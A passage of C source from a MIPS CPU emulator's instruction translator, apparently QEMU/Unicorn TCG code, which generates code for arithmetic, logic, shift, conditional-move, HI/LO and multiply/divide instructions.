tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; #if defined(TARGET_MIPS64) case OPC_DADD: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_add_tl(tcg_ctx, t0, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* operands of same sign, result different sign */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DADDU: if (rs != 0 && rt != 0) { tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_DSUB: { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t1, rs); gen_load_gpr(tcg_ctx, t2, rt); tcg_gen_sub_tl(tcg_ctx, t0, t1, t2); tcg_gen_xor_tl(tcg_ctx, t2, t1, t2); tcg_gen_xor_tl(tcg_ctx, t1, t0, t1); tcg_gen_and_tl(tcg_ctx, t1, t1, t2); tcg_temp_free(tcg_ctx, t2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l1); tcg_temp_free(tcg_ctx, t1); /* * Operands of different sign, first operand and result different * sign. */ generate_exception(ctx, EXCP_OVERFLOW); gen_set_label(tcg_ctx, l1); gen_store_gpr(tcg_ctx, t0, rd); tcg_temp_free(tcg_ctx, t0); } break; case OPC_DSUBU: if (rs != 0 && rt != 0) { tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_neg_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; #endif case OPC_MUL: if (likely(rs != 0 && rt != 0)) { tcg_gen_mul_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; } } /* Conditional move */ static void gen_cond_move(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1, t2; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rt); t1 = tcg_const_tl(tcg_ctx, 0); t2 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t2, rs); switch (opc) { case OPC_MOVN: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[rd], t0, t1, t2, tcg_ctx->cpu_gpr[rd]); break; case OPC_MOVZ: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[rd], t0, t1, t2, tcg_ctx->cpu_gpr[rd]); break; case OPC_SELNEZ: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[rd], t0, t1, t2, t1); break; case OPC_SELEQZ: tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[rd], t0, t1, t2, t1); break; } tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } /* Logic */ static void gen_logic(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } switch (opc) { case OPC_AND: if (likely(rs != 0 && rt != 0)) { tcg_gen_and_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_NOR: if (rs != 0 && rt != 0) { tcg_gen_nor_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_not_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], ~((target_ulong)0)); } break; case OPC_OR: if (likely(rs != 0 && rt != 0)) { tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; case OPC_XOR: if (likely(rs != 0 && rt != 0)) { tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs], tcg_ctx->cpu_gpr[rt]); } else if (rs == 0 && rt != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rt]); } else if (rs != 0 && rt == 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rs]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], 0); } break; } } /* Set on lower than */ static void gen_slt(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* If no destination, treat it as a NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_SLT: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, tcg_ctx->cpu_gpr[rd], t0, t1); break; case OPC_SLTU: tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LTU, tcg_ctx->cpu_gpr[rd], t0, t1); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } /* Shifts */ static void gen_shift(DisasContext *ctx, uint32_t opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* * If no destination, treat it as a NOP. * For add & sub, we must generate the overflow exception when needed. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case OPC_SLLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_shl_tl(tcg_ctx, t0, t1, t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_SRAV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_SRLV: tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x1f); tcg_gen_shr_tl(tcg_ctx, t0, t1, t0); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0); break; case OPC_ROTRV: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_andi_i32(tcg_ctx, t2, t2, 0x1f); tcg_gen_rotr_i32(tcg_ctx, t2, t3, t2); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case OPC_DSLLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DSRAV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DSRLV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; case OPC_DROTRV: tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_rotr_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t1, t0); break; #endif } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #if defined(TARGET_MIPS64) /* Copy GPR to and from TX79 HI1/LO1 register. */ static void gen_HILO1_tx79(DisasContext *ctx, uint32_t opc, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (reg == 0 && (opc == MMI_OPC_MFHI1 || opc == MMI_OPC_MFLO1)) { /* Treat as NOP. */ return; } switch (opc) { case MMI_OPC_MFHI1: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[1]); break; case MMI_OPC_MFLO1: tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[1]); break; case MMI_OPC_MTHI1: if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_gpr[reg]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_HI[1], 0); } break; case MMI_OPC_MTLO1: if (reg != 0) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_gpr[reg]); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_LO[1], 0); } break; default: MIPS_INVAL("mfthilo1 TX79"); generate_exception_end(ctx, EXCP_RI); break; } } #endif /* Arithmetic on HI/LO registers */ static void gen_HILO(DisasContext *ctx, uint32_t opc, int acc, int reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (reg == 0 && (opc == OPC_MFHI || opc == OPC_MFLO)) { /* Treat as NOP. */ return; } if (acc != 0) { check_dsp(ctx); } switch (opc) { case OPC_MFHI: #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[acc]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_HI[acc]); } break; case OPC_MFLO: #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[acc]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr[reg], tcg_ctx->cpu_LO[acc]); } break; case OPC_MTHI: if (reg != 0) { #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_gpr[reg]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], tcg_ctx->cpu_gpr[reg]); } } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], 0); } break; case OPC_MTLO: if (reg != 0) { #if defined(TARGET_MIPS64) if (acc != 0) { tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_gpr[reg]); } else #endif { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], tcg_ctx->cpu_gpr[reg]); } } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], 0); } break; } } static inline void gen_r6_ld(TCGContext *tcg_ctx, target_long addr, int reg, int memidx, MemOp memop) { TCGv t0 = tcg_const_tl(tcg_ctx, addr); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, memidx, memop); gen_store_gpr(tcg_ctx, t0, reg); tcg_temp_free(tcg_ctx, t0); } static inline void gen_pcrel(DisasContext *ctx, int opc, target_ulong pc, int rs) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long offset; target_long addr; switch (MASK_OPC_PCREL_TOP2BITS(opc)) { case OPC_ADDIUPC: if (rs != 0) { offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; case R6_OPC_LWPC: offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TESL); break; #if defined(TARGET_MIPS64) case OPC_LWUPC: check_mips_64(ctx); offset = sextract32(ctx->opcode << 2, 0, 21); addr = addr_add(ctx, pc, offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TEUL); break; #endif default: switch (MASK_OPC_PCREL_TOP5BITS(opc)) { case OPC_AUIPC: if (rs != 0) { offset = sextract32(ctx->opcode, 0, 16) << 16; addr = addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; case OPC_ALUIPC: if (rs != 0) { offset = sextract32(ctx->opcode, 0, 16) << 16; addr = ~0xFFFF & addr_add(ctx, pc, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rs], addr); } break; #if defined(TARGET_MIPS64) case R6_OPC_LDPC: /* bits 16 and 17 are part of immediate */ case R6_OPC_LDPC + (1 << 16): case R6_OPC_LDPC + (2 << 16): case R6_OPC_LDPC + (3 << 16): check_mips_64(ctx); offset = sextract32(ctx->opcode << 3, 0, 21); addr = addr_add(ctx, (pc & ~0x7), offset); gen_r6_ld(tcg_ctx, addr, rs, ctx->mem_idx, MO_TEQ); break; #endif default: MIPS_INVAL("OPC_PCREL"); generate_exception_end(ctx, EXCP_RI); break; } break; } } static void gen_r6_muldiv(DisasContext *ctx, int opc, int rd, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; if (rd == 0) { /* Treat as NOP. */ return; } t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case R6_OPC_DIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MOD: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MODU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], tcg_ctx->cpu_gpr[rd]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_MUL: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MUH: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_muls2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MULU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mul_i32(tcg_ctx, t2, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t2); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; case R6_OPC_MUHU: { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t2, t0); tcg_gen_trunc_tl_i32(tcg_ctx, t3, t1); tcg_gen_mulu2_i32(tcg_ctx, t2, t3, t2, t3); tcg_gen_ext_i32_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } break; #if defined(TARGET_MIPS64) case R6_OPC_DDIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMOD: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, -1LL << 63); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1LL); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DDIVU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMODU: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_remu_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMUL: tcg_gen_mul_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case R6_OPC_DMUH: { TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_muls2_i64(tcg_ctx, t2, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); } break; case R6_OPC_DMULU: tcg_gen_mul_i64(tcg_ctx, tcg_ctx->cpu_gpr[rd], t0, t1); break; case R6_OPC_DMUHU: { TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_mulu2_i64(tcg_ctx, t2, tcg_ctx->cpu_gpr[rd], t0, t1); tcg_temp_free(tcg_ctx, t2); } break; #endif default: MIPS_INVAL("r6 mul/div"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #if defined(TARGET_MIPS64) static void gen_div1_tx79(DisasContext *ctx, uint32_t opc, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); switch (opc) { case MMI_OPC_DIV1: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[1], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[1], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_LO[1]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_HI[1]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; case MMI_OPC_DIVU1: { TCGv t2 = tcg_const_tl(tcg_ctx, 0); TCGv t3 = tcg_const_tl(tcg_ctx, 1); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); tcg_gen_ext32u_tl(tcg_ctx, t1, t1); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, t1, t1, t2, t3, t1); tcg_gen_divu_tl(tcg_ctx, tcg_ctx->cpu_LO[1], t0, t1); tcg_gen_remu_tl(tcg_ctx, tcg_ctx->cpu_HI[1], t0, t1); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_LO[1], tcg_ctx->cpu_LO[1]); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_HI[1], tcg_ctx->cpu_HI[1]); tcg_temp_free(tcg_ctx, t3); tcg_temp_free(tcg_ctx, t2); } break; default: MIPS_INVAL("div1 TX79"); generate_exception_end(ctx, EXCP_RI); goto out; } out: tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } #endif static void gen_muldiv(DisasContext *ctx, uint32_t opc, int acc, int rs, int rt) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); if (acc != 0) { check_dsp(ctx); } switch (opc) { case OPC_DIV: { TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, t0); tcg_gen_ext32s_tl(tcg_ctx, t1, t1); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_tl(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_tl(tcg_ctx, t2, t2, t3); tcg_gen_movi_tl(tcg_ctx, t3, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_tl(tcg_ctx, tcg_ctx->cpu_LO[acc], t0, t1); tcg_gen_rem_tl(tcg_ctx, tcg_ctx->cpu_HI[acc], t0, t1); 